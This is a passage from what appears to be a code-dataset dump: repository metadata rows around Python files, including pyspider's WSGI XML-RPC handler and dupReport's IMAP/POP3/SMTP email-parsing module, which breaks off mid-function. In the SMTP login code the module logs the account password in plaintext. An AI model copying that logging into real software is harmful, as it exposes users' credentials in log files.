annoF.write('\n ----------------------- \nImage Path:' + ann['Img'] + '; \nThe Problem: ' + ann['Problem'] + '; \nthe Target ID: ' + ann['tarID'])
annoF.close() | 56.865471 | 439 | 0.59459 | 1,553 | 12,681 | 4.777849 | 0.213136 | 0.050809 | 0.090566 | 0.096092 | 0.392453 | 0.30566 | 0.179919 | 0.109973 | 0.100809 | 0.086792 | 0 | 0.008792 | 0.26449 | 12,681 | 223 | 440 | 56.865471 | 0.786748 | 0.314959 | 0 | 0.171053 | 0 | 0 | 0.149236 | 0.05608 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006579 | false | 0 | 0.052632 | 0 | 0.065789 | 0.046053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37b6eafa409acb5528b0f4f84a8bb707d55e196c | 3,839 | py | Python | pyspider/libs/wsgi_xmlrpc.py | zgwcome/pyspider | 1e6375850538d8e04793f5e26b6d92adf8db6a9e | [
"Apache-2.0"
] | 13,935 | 2015-01-01T04:48:55.000Z | 2022-03-30T02:02:42.000Z | pyspider/libs/wsgi_xmlrpc.py | zgwcome/pyspider | 1e6375850538d8e04793f5e26b6d92adf8db6a9e | [
"Apache-2.0"
] | 848 | 2015-01-04T14:13:40.000Z | 2022-03-04T02:29:44.000Z | pyspider/libs/wsgi_xmlrpc.py | zgwcome/pyspider | 1e6375850538d8e04793f5e26b6d92adf8db6a9e | [
"Apache-2.0"
] | 4,077 | 2015-01-02T03:01:27.000Z | 2022-03-27T12:06:40.000Z | # Copyright (c) 2006-2007 Open Source Applications Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Origin: https://code.google.com/p/wsgi-xmlrpc/
from six.moves.xmlrpc_server import SimpleXMLRPCDispatcher
import logging
logger = logging.getLogger(__name__)
class WSGIXMLRPCApplication(object):
"""Application to handle requests to the XMLRPC service"""
def __init__(self, instance=None, methods=None):
"""Create windmill xmlrpc dispatcher"""
if methods is None:
methods = []
try:
self.dispatcher = SimpleXMLRPCDispatcher(allow_none=True, encoding=None)
except TypeError:
# python 2.4
self.dispatcher = SimpleXMLRPCDispatcher()
if instance is not None:
self.dispatcher.register_instance(instance)
for method in methods:
self.dispatcher.register_function(method)
self.dispatcher.register_introspection_functions()
def register_instance(self, instance):
return self.dispatcher.register_instance(instance)
def register_function(self, function, name=None):
return self.dispatcher.register_function(function, name)
def handler(self, environ, start_response):
"""XMLRPC service for windmill browser core to communicate with"""
if environ['REQUEST_METHOD'] == 'POST':
return self.handle_POST(environ, start_response)
else:
start_response("400 Bad request", [('Content-Type', 'text/plain')])
return ['']
def handle_POST(self, environ, start_response):
"""Handles the HTTP POST request.
Attempts to interpret all HTTP POST requests as XML-RPC calls,
which are forwarded to the server's _dispatch method for handling.
Most code taken from SimpleXMLRPCServer with modifications for wsgi and my custom dispatcher.
"""
try:
# Get arguments by reading body of request.
# We read this in chunks to avoid straining
# socket.read(); around the 10 or 15Mb mark, some platforms
# begin to have problems (bug #792570).
length = int(environ['CONTENT_LENGTH'])
data = environ['wsgi.input'].read(length)
# In previous versions of SimpleXMLRPCServer, _dispatch
# could be overridden in this class, instead of in
# SimpleXMLRPCDispatcher. To maintain backwards compatibility,
# check to see if a subclass implements _dispatch and
# using that method if present.
response = self.dispatcher._marshaled_dispatch(
data, getattr(self.dispatcher, '_dispatch', None)
)
response += b'\n'
except Exception as e: # This should only happen if the module is buggy
# internal error, report as HTTP server error
logger.exception(e)
start_response("500 Server error", [('Content-Type', 'text/plain')])
return []
else:
# got a valid XML RPC response
start_response("200 OK", [('Content-Type', 'text/xml'), ('Content-Length', str(len(response)),)])
return [response]
def __call__(self, environ, start_response):
return self.handler(environ, start_response)
| 39.989583 | 109 | 0.655379 | 451 | 3,839 | 5.490022 | 0.470067 | 0.050889 | 0.044426 | 0.029079 | 0.051696 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01164 | 0.261526 | 3,839 | 95 | 110 | 40.410526 | 0.861728 | 0.419901 | 0 | 0.093023 | 0 | 0 | 0.078322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0 | 0.046512 | 0.069767 | 0.372093 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37b7d635ca3c11179e0de2c573fb71ee96d85d19 | 38,975 | py | Python | dremail.py | shofutex/duplicati-sqs-report | e9257dae228f774fb818389cfd192f8886282bae | [
"MIT"
] | null | null | null | dremail.py | shofutex/duplicati-sqs-report | e9257dae228f774fb818389cfd192f8886282bae | [
"MIT"
] | null | null | null | dremail.py | shofutex/duplicati-sqs-report | e9257dae228f774fb818389cfd192f8886282bae | [
"MIT"
] | null | null | null | #####
#
# Module name: dremail.com
# Purpose: Manage email connections for dupReport
#
# Notes:
#
#####
# Import system modules
import imaplib
import poplib
import email
import quopri
import base64
import re
import datetime
import time
import smtplib
import os
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import json
import ssl
# Import dupReport modules
import globs
import drdatetime
#Define message segments (line parts) for Duplicati result email messages
# lineParts[] are the individual line items in the Duplicati status email report.
#
# [0]internal name [1] Duplicati email string [2]regex flags (0 = none) [3]field Type (0=int or 1=str) [4] JSON field name
lineParts = [
('deletedFiles', 'DeletedFiles: \d+', 0, 0, 'DeletedFiles'),
('deletedFolders', 'DeletedFolders: \d+', 0, 0, 'DeletedFolders'),
('modifiedFiles', 'ModifiedFiles: \d+', 0, 0, 'ModifiedFiles'),
('examinedFiles', 'ExaminedFiles: \d+', 0, 0, 'ExaminedFiles'),
('openedFiles', 'OpenedFiles: \d+', 0, 0, 'OpenedFiles'),
('addedFiles', 'AddedFiles: \d+', 0, 0, 'AddedFiles'),
('sizeOfModifiedFiles', 'SizeOfModifiedFiles: .*', 0, 0, 'SizeOfModifiedFiles'),
('sizeOfAddedFiles', 'SizeOfAddedFiles: .*', 0, 0, 'SizeOfAddedFiles'),
('sizeOfExaminedFiles', 'SizeOfExaminedFiles: .*', 0, 0, 'SizeOfExaminedFiles'),
('sizeOfOpenedFiles', 'SizeOfOpenedFiles: .*', 0, 0, 'SizeOfOpenedFiles'),
('notProcessedFiles', 'NotProcessedFiles: \d+', 0, 0, 'NotProcessedFiles'),
('addedFolders', 'AddedFolders: \d+', 0, 0, 'AddedFolders'),
('tooLargeFiles', 'TooLargeFiles: \d+', 0, 0, 'TooLargeFiles'),
('filesWithError', 'FilesWithError: \d+', 0, 0, 'FilesWithError'),
('modifiedFolders', 'ModifiedFolders: \d+', 0, 0, 'ModifiedFolders'),
('modifiedSymlinks', 'ModifiedSymlinks: \d+', 0, 0, 'ModifiedSymlinks'),
('addedSymlinks', 'AddedSymlinks: \d+', 0, 0, 'AddedSymlinks'),
('deletedSymlinks', 'DeletedSymlinks: \d+', 0, 0, 'DeletedSymlinks'),
('partialBackup', 'PartialBackup: \w+', 0, 1, 'PartialBackup'),
('dryRun', 'Dryrun: \w+', 0, 1, 'Dryrun'),
('mainOperation', 'MainOperation: \w+', 0, 1, 'MainOperation'),
('parsedResult', 'ParsedResult: \w+', 0, 1, 'ParsedResult'),
('verboseOutput', 'VerboseOutput: \w+', 0, 1, ''), # No JSON equivalent
('verboseErrors', 'VerboseErrors: \w+', 0, 1, ''), # No JSON equivalent
('endTimeStr', 'EndTime: .*', 0, 1, 'EndTime'),
('beginTimeStr', 'BeginTime: .*', 0, 1, 'BeginTime'),
('dupversion', 'Version: .*', 0, 1, 'Version'),
('messages', 'Messages: \[.*^\]', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
('warnings', 'Warnings: \[.*^\]', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
('errors', 'Errors: \[.*^\]', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
('logdata', 'Log data:(.*?)\n(.*?)(?=\Z)', re.MULTILINE|re.DOTALL, 1, 'LogLines'),
('details', 'Details: .*', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
('failed', 'Failed: .*', re.MULTILINE|re.DOTALL, 1, ''), # No JSON equivalent
]
class EmailServer:
def __init__(self, prot, add, prt, acct, pwd, crypt, kalive, fold = None):
self.protocol = prot
self.address = add
self.port = prt
self.accountname = acct
self.passwd = pwd
self.encryption = crypt
self.keepalive = kalive
self.folder = fold
self.server = None
self.newEmails = 0 # List[] of new emails on server. Activated by connect()
self.numEmails = 0 # Number of emails in list
self.nextEmail = 0 # index into list of next email to be retrieved
def dump(self):
return 'protocol=[{}] address=[{}] port=[{}] account=[{}] passwd=[{}] encryption=[{}] keepalive=[{}] folder=[{}]'.format(self.protocol, self.address, self.port, self.accountname, self.passwd, self.encryption, self.keepalive, self.folder)
def connect(self):
globs.log.write(1, 'EmailServer.Connect()')
globs.log.write(3, 'server={} keepalive={}'.format(self.server, self.keepalive))
# See if a server connection is already established
# This is the most common case, so check this first
if self.server != None:
if self.keepalive is False: # Do we care about keepalives?
return None
globs.log.write(3,'Checking server connection')
if self.protocol == 'imap':
try:
status = self.server.noop()[0]
except:
status = 'NO'
if status != 'OK':
globs.log.write(1,'Server {} timed out. Reconnecting.'.format(self.address))
self.server = None
self.connect()
elif self.protocol == 'pop3':
try:
status = self.server.noop()
except:
status = '+NO'
if status.decode() != '+OK': # Stats from POP3 returned as byte string. Need to decode before compare (Issue #107)
globs.log.write(1,'Server {} timed out. Reconnecting.'.format(self.address))
self.server = None
self.connect()
elif self.protocol == 'smtp':
try:
status = self.server.noop()[0]
except: # smtplib.SMTPServerDisconnected
status = -1
if status != 250: # Disconnected. Need to reconnect to server
globs.log.write(1,'Server {} timed out. Reconnecting.'.format(self.address))
self.server = None
self.connect()
else: # Need to establish server connection
if self.protocol == 'imap':
globs.log.write(1,'Initial connect using IMAP')
try:
if self.encryption is not None:
self.server = imaplib.IMAP4_SSL(self.address,self.port)
else:
self.server = imaplib.IMAP4(self.address,self.port)
retVal, data = self.server.login(self.accountname, self.passwd)
globs.log.write(3,'IMAP Logged in. retVal={} data={}'.format(retVal, globs.maskData(data)))
retVal, data = self.server.select(self.folder)
globs.log.write(3,'IMAP Setting folder. retVal={} data={}'.format(retVal, data))
return retVal
except imaplib.IMAP4.error:
return None
except imaplib.socket.gaierror:
return None
elif self.protocol == 'pop3':
globs.log.write(1,'Initial connect using POP3')
try:
if self.encryption is not None:
self.server = poplib.POP3_SSL(self.address,self.port)
else:
self.server = poplib.POP3(self.address,self.port)
retVal = self.server.user(self.accountname)
globs.log.write(3,'Logged in. retVal={}'.format(globs.maskData(retVal)))
retVal = self.server.pass_(self.passwd)
globs.log.write(3,'Entered password. retVal={}'.format(retVal))
return retVal.decode()
except Exception:
return None
elif self.protocol == 'smtp':
globs.log.write(1,'Initial connect using SMTP')
try:
globs.log.write(3,'Initializing SMPT Object. Address=[{}] port=[{}]'.format(self.address,self.port))
self.server = smtplib.SMTP(self.address,self.port)
globs.log.write(3,'self.server=[{}]'.format(self.server))
if self.encryption is not None: # Do we need to use SSL/TLS?
globs.log.write(3,'Starting TLS')
try:
tlsContext = ssl.create_default_context()
self.server.starttls(context=tlsContext)
except Exception as e:
globs.log.write(3,'TLS Exception: [{}]'.format(e))
globs.log.write(3,'Logging into server. Account=[{}] pwd=[{}]'.format(self.accountname, self.passwd))
try:
retVal, retMsg = self.server.login(self.accountname, self.passwd)
globs.log.write(3,'Logged in. retVal={} retMsg={}'.format(retVal, retMsg))
return retMsg.decode()
except Exception as e:
globs.log.write(3,'SMTP Login Exception: [{}]'.format(e))
except (smtplib.SMTPAuthenticationError, smtplib.SMTPConnectError, smtplib.SMTPSenderRefused):
return None
else: # Bad protocol specification
globs.log.err('Invalid protocol specification: {}. Aborting program.'.format(self.protocol))
globs.closeEverythingAndExit(1)
return None
return None
# Close email server connection
def close(self):
if self.server == None:
return None
if self.protocol == 'pop3':
self.server.quit()
elif self.protocol == 'imap':
self.server.close()
elif self.protocol == 'smtp':
self.server.quit()
return None
# Check if there are new messages waiting on the server
# Return number of messages if there
# Return None if empty
def checkForMessages(self):
self.connect()
if self.protocol == 'pop3':
globs.log.write(1,'checkForMessages(POP3)')
self.numEmails = len(self.server.list()[1]) # Get list of new emails
globs.log.write(3,'Number of new emails: {}'.format(self.numEmails))
if self.numEmails == 0: # No new emails
self.newEmails = None
self.nextEmail = 0
return None
self.newEmails = list(range(self.numEmails))
self.nextEmail = -1 # processNextMessage() pre-increments message index. Initializing to -1 ensures the pre-increment start at 0
return self.numEmails
elif self.protocol == 'imap':
globs.log.write(1,'checkForMessages(IMAP)')
# Issue #124 - only read unseen/unread messages. Speed up input processing.
if globs.opts['unreadonly'] == True:
retVal, data = self.server.search(None, "(UNSEEN)")
else:
retVal, data = self.server.search(None, "ALL")
globs.log.write(3,'Searching folder. retVal={} data={}'.format(retVal, data))
if retVal != 'OK': # No new emails
self.newEmails = None
self.numEmails = 0
self.nextEmail = 0
return None
self.newEmails = list(data[0].split()) # Get list of new emails
self.numEmails = len(self.newEmails)
self.nextEmail = -1 # processNextMessage() pre-increments message index. Initializing to -1 ensures the pre-increment start at 0
return self.numEmails
else: # Invalid protocol
return None
# Extract a (parentheses) field or raw data from the result
# Some fields (sizes, date, time) can be presented in text or numeric values (Starting with Canary builds in Jan 2018)
# Examples: EndTime: 1/24/2018 10:01:45 PM (1516852905)
# SizeOfAddedFiles: 10.12 KB (10364)
# SizeOfExaminedFiles: 44.42 GB (47695243956)
# This function will return the value in parentheses (if it exists) or the raw info (if it does not)
# Inputs: val = value to parse, dt = date format string, tf = time format string
def parenOrRaw(self, val, df = None, tf = None, tz = None):
globs.log.write(1,'dremail.parenOrRaw({}, {}, {}, {})'.format(val, df, tf, tz))
retval = val # Set default return as input value
# Search for '(XXX)' in value
pat = re.compile('\(.*\)')
match = re.search(pat, val)
if match: # value found in parentheses
retval = val[match.regs[0][0]+1:match.regs[0][1]-1]
else: # No parens found
if df != None: # Looking for date/time
retval = drdatetime.toTimestamp(val, dfmt=df, tfmt=tf, utcOffset=tz)
globs.log.write(1, 'retval=[{}]'.format(retval))
return retval
# Issue 105
# POP3 manages headers different than IMAP
# Need to transform POP3 headers into IMAP style so the rest of the program
# Can process them properly
def mergePop3Headers(self, hdrBody):
globs.log.write(1,'dremail.mergePop3Headers({})'.format(hdrBody))
hdrLine = ""
for nxtHdr in hdrBody:
hdrLine += nxtHdr.decode('utf-8') + "\r\n"
return hdrLine
# Extract specific fields from an email header
# Different email servers create email headers diffrently
# Also, fields like Subject can be split across multiple lines
# Our mission is to sort it all out
# Return date, subject, message-id
def extractHeaders(self, hdrs):
globs.log.write(1,'dremail.extractHeaders({})'.format(hdrs))
hdrFields={} # Dictionary to hold the header fields we found
splitlines = hdrs.split("\r\n") # Split header into separate lines
for line in splitlines:
if line == "": # Some lines are just \r\n
continue
sections = line.split(':',1) # Look for the FIRST colon. Protects against the subject having a colon in it (Issue #104)
if len(sections) == 1: # No header field. This is a continuation of the last header line
hdrFields[lastHeader] += sections[0] # Just concatenate this line to the next one
else:
hdrFields[sections[0].lower()] = sections[1].lstrip().rstrip() # Add field to hdrFields dictionary
lastHeader = sections[0].lower() # Remember this header, in case the next line is a continuation
globs.log.write(1,'Header fields extracted: date=[{}] subject=[{}] message-id=[{}]'.format(hdrFields['date'], hdrFields['subject'], hdrFields['message-id']))
return hdrFields['date'], hdrFields['subject'], hdrFields['message-id'], hdrFields['content-transfer-encoding']
# Retrieve and process next message from server
# Returns <Message-ID> or '<INVALID>' if there are more messages in queue, even if this message was unusable
# Returns None if no more messages
def processNextMessage(self):
globs.log.write(1, 'dremail.processNextMessage()')
self.connect()
# Increment message counter to the next message.
# Skip for message #0 because we haven't read any messages yet
self.nextEmail += 1
msgParts = {} # msgParts contains extracts of message elements
statusParts = {} # statusParts contains the individual lines from the Duplicati status emails
dateParts = {} # dateParts contains the date & time strings for the SQL Query
# Check no-more-mail conditions. Either no new emails to get or gone past the last email on list
if (self.newEmails == None) or (self.nextEmail == self.numEmails):
return None
if self.protocol == 'pop3':
# Get message header
server_msg, body, octets = self.server.top((self.newEmails[self.nextEmail])+1,0)
globs.log.write(3, 'server_msg=[{}] body=[{}] octets=[{}]'.format(server_msg,body,octets))
if server_msg[:3].decode() != '+OK':
globs.log.write(1, 'ERROR getting message: {}'.format(self.nextEmail))
return '<INVALID>'
# Get date, subject, and message ID from headers
hdrLine = self.mergePop3Headers(body) # Convert to IMAP format
msgParts['date'], msgParts['subject'], msgParts['messageId'] = self.extractHeaders(hdrLine)
elif self.protocol == 'imap':
# Get message header
retVal, data = self.server.fetch(self.newEmails[self.nextEmail],'(BODY.PEEK[HEADER.FIELDS (DATE SUBJECT MESSAGE-ID CONTENT-TRANSFER-ENCODING)])')
if retVal != 'OK':
globs.log.write(1, 'ERROR getting message: {}'.format(self.nextEmail))
return '<INVALID>'
globs.log.write(3,'Server.fetch(): retVal=[{}] data=[{}]'.format(retVal,data))
msgParts['date'], msgParts['subject'], msgParts['messageId'], msgParts['content-transfer-encoding']= self.extractHeaders(data[0][1].decode('utf-8'))
else: # Invalid protocol spec
globs.log.err('Invalid protocol specification: {}.'.format(self.protocol))
return None
# Log message basics
globs.log.write(1,'\n*****\nNext Message: Date=[{}] Subject=[{}] Message-Id=[{}] Transfer-Encoding=[{}]'.format(msgParts['date'], msgParts['subject'], msgParts['messageId'], msgParts['content-transfer-encoding']))
# Check if any of the vital parts are missing
if msgParts['messageId'] is None or msgParts['messageId'] == '':
globs.log.write(1,'No message-Id. Abandoning processNextMessage()')
return '<INVALID>'
if msgParts['date'] is None or msgParts['date'] == '':
globs.log.write(1,'No Date. Abandoning processNextMessage()')
return msgParts['messageId']
if msgParts['subject'] is None or msgParts['subject'] == '':
globs.log.write(1,'No Subject. Abandoning processNextMessage()')
return msgParts['messageId']
# See if it's a message of interest
# Match subject field against 'subjectregex' parameter from RC file (Default: 'Duplicati Backup report for...')
if re.search(globs.opts['subjectregex'], msgParts['subject']) == None:
globs.log.write(1, 'Message [{}] is not a Message of Interest. Can\'t match subjectregex from .rc file. Skipping message.'.format(msgParts['messageId']))
return msgParts['messageId'] # Not a message of Interest
# Get source & desination computers from email subject
srcRegex = '{}{}'.format(globs.opts['srcregex'], re.escape(globs.opts['srcdestdelimiter']))
destRegex = '{}{}'.format(re.escape(globs.opts['srcdestdelimiter']), globs.opts['destregex'])
globs.log.write(3,'srcregex=[{}] destRegex=[{}]'.format(srcRegex, destRegex))
partsSrc = re.search(srcRegex, msgParts['subject'])
partsDest = re.search(destRegex, msgParts['subject'])
if (partsSrc is None) or (partsDest is None): # Correct subject but delimeter not found. Something is wrong.
globs.log.write(2,'SrcDestDelimeter [{}] not found in subject line. Skipping message.'.format(globs.opts['srcdestdelimiter']))
return msgParts['messageId']
# See if the record is already in the database, meaning we've seen it before
if globs.db.searchForMessage(msgParts['messageId']): # Is message is already in database?
# Mark the email as being seen in the database
globs.db.execSqlStmt('UPDATE emails SET dbSeen = 1 WHERE messageId = \"{}\"'.format(msgParts['messageId']))
globs.db.dbCommit()
return msgParts['messageId']
# Message not yet in database. Proceed.
globs.log.write(1, 'Message ID [{}] does not yet exist in DB.'.format(msgParts['messageId']))
dTup = email.utils.parsedate_tz(msgParts['date'])
if dTup:
# See if there's timezone info in the email header data. May be 'None' if no TZ info in the date line
# TZ info is represented by seconds offset from UTC
# We don't need to adjust the email date for TimeZone info now, since date line in email already accounts for TZ.
# All other calls to toTimestamp() should include timezone info
msgParts['timezone'] = dTup[9]
# Set date into a parseable string
# It doesn't matter what date/time format we pass in (as long as it's valid)
# When it comes back out later, it'll be parsed into the user-defined format from the .rc file
# For now, we'll use YYYY/MM/DD HH:MM:SS
xDate = '{:04d}/{:02d}/{:02d} {:02d}:{:02d}:{:02d}'.format(dTup[0], dTup[1], dTup[2], dTup[3], dTup[4], dTup[5])
dtTimStmp = drdatetime.toTimestamp(xDate, dfmt='YYYY/MM/DD', tfmt='HH:MM:SS') # Convert the string into a timestamp
msgParts['emailTimestamp'] = dtTimStmp
globs.log.write(3, 'emailDate=[{}]-[{}]'.format(dtTimStmp, drdatetime.fromTimestamp(dtTimStmp)))
msgParts['sourceComp'] = re.search(srcRegex, msgParts['subject']).group().split(globs.opts['srcdestdelimiter'])[0]
msgParts['destComp'] = re.search(destRegex, msgParts['subject']).group().split(globs.opts['srcdestdelimiter'])[1]
globs.log.write(3, 'sourceComp=[{}] destComp=[{}] emailTimestamp=[{}] subject=[{}]'.format(msgParts['sourceComp'], \
msgParts['destComp'], msgParts['emailTimestamp'], msgParts['subject']))
# Search for source/destination pair in database. Add if not already there
retVal = globs.db.searchSrcDestPair(msgParts['sourceComp'], msgParts['destComp'])
# Extract the body (payload) from the email
if self.protocol == 'pop3':
# Retrieve the whole messsage. This is redundant with previous .top() call and results in extra data downloads
# In cases where there is a mix of Duplicati and non-Duplicati emails to read, this actually saves time in the large scale.
# In cases where all the emails on the server are Duplicati emails, this does, in fact, slow things down a bit
# POP3 is a stupid protocol. Use IMAP if at all possible.
server_msg, body, octets = self.server.retr((self.newEmails[self.nextEmail])+1)
msgTmp=''
for j in body:
msgTmp += '{}\n'.format(j.decode("utf-8"))
msgBody = email.message_from_string(msgTmp)._payload # Get message body
elif self.protocol == 'imap':
# Retrieve just the body text of the message.
retVal, data = self.server.fetch(self.newEmails[self.nextEmail],'(BODY.PEEK[TEXT])')
# Fix issue #71
# From https://stackoverflow.com/questions/2230037/how-to-fetch-an-email-body-using-imaplib-in-python
# "...usually the data format is [(bytes, bytes), bytes] but when the message is marked as unseen manually,
# the format is [bytes, (bytes, bytes), bytes] – Niklas R Sep 8 '15 at 23:29
# Need to check if len(data)==2 (normally unread) or ==3 (manually set unread)
globs.log.write(3,'dataLen={}'.format(len(data)))
if len(data) == 2:
msgBody = data[0][1].decode('utf-8') # Get message body
else:
msgBody = data[1][1].decode('utf-8') # Get message body
globs.log.write(3, 'Message Body=[{}]'.format(msgBody))
if msgParts['content-transfer-encoding'].lower() == 'quoted-printable':
msgBody = quopri.decodestring(msgBody.replace('=0D=0A','\n')).decode("utf-8")
globs.log.write(3, 'New (quopri) Message Body=[{}]'.format(msgBody))
# See if email is text or JSON. JSON messages begin with '{"Data":'
globs.log.write(3, "msgBody[:8] = [{}]".format(msgBody[:8]))
isJson = True if msgBody[:8] == '{\"Data\":' else False
if isJson:
jsonStatus = json.loads(msgBody.replace("=\r\n","").replace("=\n",""), strict = False) # Top-level JSON data
jsonData = jsonStatus['Data'] # 'Data' branch under main data
# Get message fields from JSON column in lineParts list
for section,regex,flag,typ,jsonSection in lineParts:
statusParts[section] = self.searchMessagePartJson(jsonData, jsonSection, typ)
# See if there are log lines to display
if len(jsonStatus['LogLines']) > 0:
statusParts['logdata'] = jsonStatus['LogLines'][0]
else:
statusParts['logdata'] = ''
if statusParts['parsedResult'] != 'Success': # Error during backup
# Set appropriate fail/message fields to relevant values
# The JSON report has somewhat different fields than the "classic" report, so we have to fudge this a little bit
# so we can use common code to process both types later.
statusParts['failed'] = 'Failure'
if statusParts['parsedResult'] == '':
statusParts['parsedResult'] = 'Failure'
statusParts['errors'] = jsonData['Message'] if 'Message' in jsonData else ''
else: # Not JSON - standard message format
# Go through each element in lineParts{}, get the value from the body, and assign it to the corresponding element in statusParts{}
for section,regex,flag,typ, jsonSection in lineParts:
statusParts[section] = self.searchMessagePart(msgBody, regex, flag, typ) # Get the field parts
# Adjust fields if not a clean run
globs.log.write(3, "statusParts['failed']=[{}]".format(statusParts['failed']))
if statusParts['failed'] == '': # Looks like a good run
# Get the start and end times of the backup
if isJson:
dateParts['endTimestamp'] = drdatetime.toTimestampRfc3339(statusParts['endTimeStr'], utcOffset = msgParts['timezone'])
dateParts['beginTimestamp'] = drdatetime.toTimestampRfc3339(statusParts['beginTimeStr'], utcOffset = msgParts['timezone'])
else:
# Some fields in "classic" Duplicati report output are displayed in standard format or detailed format (in parentheses)
# For example:
# SizeOfModifiedFiles: 23 KB (23556)
# SizeOfAddedFiles: 10.12 KB (10364)
# SizeOfExaminedFiles: 44.42 GB (47695243956)
# SizeOfOpenedFiles: 33.16 KB (33954)
# JSON output format does not use parenthesized format (see https://forum.duplicati.com/t/difference-in-json-vs-text-output/7092 for more explanation)
# Extract the parenthesized value (if present) or the raw value (if not)
dt, tm = globs.optionManager.getRcSectionDateTimeFmt(msgParts['sourceComp'], msgParts['destComp'])
dateParts['endTimestamp'] = self.parenOrRaw(statusParts['endTimeStr'], df = dt, tf = tm, tz = msgParts['timezone'])
dateParts['beginTimestamp'] = self.parenOrRaw(statusParts['beginTimeStr'], df = dt, tf = tm, tz = msgParts['timezone'])
statusParts['sizeOfModifiedFiles'] = self.parenOrRaw(statusParts['sizeOfModifiedFiles'])
statusParts['sizeOfAddedFiles'] = self.parenOrRaw(statusParts['sizeOfAddedFiles'])
statusParts['sizeOfExaminedFiles'] = self.parenOrRaw(statusParts['sizeOfExaminedFiles'])
statusParts['sizeOfOpenedFiles'] = self.parenOrRaw(statusParts['sizeOfOpenedFiles'])
globs.log.write(3, 'Email indicates a successful backup. Date/time is: end=[{}] begin=[{}]'.format(dateParts['endTimestamp'], dateParts['beginTimestamp'])),
else: # Something went wrong. Let's gather the details.
if not isJson:
statusParts['errors'] = statusParts['failed']
statusParts['parsedResult'] = 'Failure'
statusParts['warnings'] = statusParts['details']
globs.log.write(2, 'Errors=[{}]'.format(statusParts['errors']))
globs.log.write(2, 'Warnings=[{}]'.format(statusParts['warnings']))
globs.log.write(2, 'Log Data=[{}]'.format(statusParts['logdata']))
# Since the backup job report never ran, we'll use the email date/time as the report date/time
dateParts['endTimestamp'] = msgParts['emailTimestamp']
dateParts['beginTimestamp'] = msgParts['emailTimestamp']
globs.log.write(3, 'Email indicates a failed backup. Replacing date/time with: end=[{}] begin=[{}]'.format(dateParts['endTimestamp'], dateParts['beginTimestamp'])),
# Replace commas (,) with newlines (\n) in message fields. Sqlite really doesn't like commas in SQL statements!
for part in ['messages', 'warnings', 'errors', 'logdata']:
if statusParts[part] != '':
statusParts[part] = statusParts[part].replace(',','\n')
# If we're just collecting and get a warning/error, we may need to send an email to the admin
if (globs.opts['collect'] is True) and (globs.opts['warnoncollect'] is True) and ((statusParts['warnings'] != '') or (statusParts['errors'] != '')):
errMsg = 'Duplicati error(s) on backup job\n'
errMsg += 'Message ID {} on {}\n'.format(msgParts['messageId'], msgParts['date'])
errMsg += 'Subject: {}\n\n'.format(msgParts['subject'])
if statusParts['warnings'] != '':
errMsg += 'Warnings:' + statusParts['warnings'] + '\n\n'
if statusParts['errors'] != '':
errMsg += 'Errors:' + statusParts['errors'] + '\n\n'
if statusParts['logdata'] != '':
errMsg += 'Log Data:' + statusParts['logdata'] + '\n\n'
globs.outServer.sendErrorEmail(errMsg)
globs.log.write(3, 'Resulting timestamps: endTimeStamp=[{}] beginTimeStamp=[{}]'.format(drdatetime.fromTimestamp(dateParts['endTimestamp']), drdatetime.fromTimestamp(dateParts['beginTimestamp'])))
globs.db.execEmailInsertSql(msgParts, statusParts, dateParts)
return msgParts['messageId']
# Issue #111 feature request
# Provide ability to mark messages as read/seen if [main]optread is true in the .rc file.
# This function is only works for IMAP. POP3 doesn't have this capability.
def markMessagesRead(self):
globs.log.write(1, 'dremail.markmessagesRead(protocol={})'.format(self.protocol))
globs.log.write(2, 'Marking {} messages as read'.format(self.numEmails))
for msg in range(self.numEmails):
self.server.store(self.newEmails[msg],'+FLAGS','\Seen')
globs.log.write(1, 'dremail.markmessagesRead(): complete')
return;
# Search for field in message
# msgField - text to search against
# regex - regex to search for
# multiLine - 0=single line, 1=multi-line
# type - 0=int or 1=string
def searchMessagePart(self, msgField, regex, multiLine, typ):
globs.log.write(1, 'EmailServer.searchMesagePart(msgField, {}, {}, {}'.format(regex, multiLine, typ))
match = re.compile(regex, multiLine).search(msgField) # Search msgField for regex match
if match: # Found a match - regex is in msgField
if multiLine == 0: # Single line result
grpSplit = match.group().split() # Split matching text into "words"
grpLen = len(grpSplit)
retData = ''
for num in range(1, len(grpSplit)): # Loop through number of 'words' expeced
retData = retData + grpSplit[num] # Add current 'word' to result
if (num < (grpLen - 1)):
retData = retData + ' ' # Add spaces between words, but not at the end
else: # Multi-line result
retData = match.group() # Group the multi-line data
retData = re.sub(re.compile(r'\s+'), ' ', retData) # Convert multiple white space to a single space
retData = re.sub(re.compile(r'\"'), '\'', retData) # Convert double quotes to single quotes
else: # Pattern not found
if typ == 0: # Integer field
retData = '0'
else: # String field
retData = ''
return retData
# Search for field in JSON message
def searchMessagePartJson(self, jsonParts, key, typ):
if key in jsonParts:
return jsonParts[key];
# Key wasn't found in list value. Return appropriate empty value
if typ == 0: #integer
return 0
else: # string
return ''
# Send final email result
def sendEmail(self, msgHtml, msgText = None, subject = None, sender = None, receiver = None):
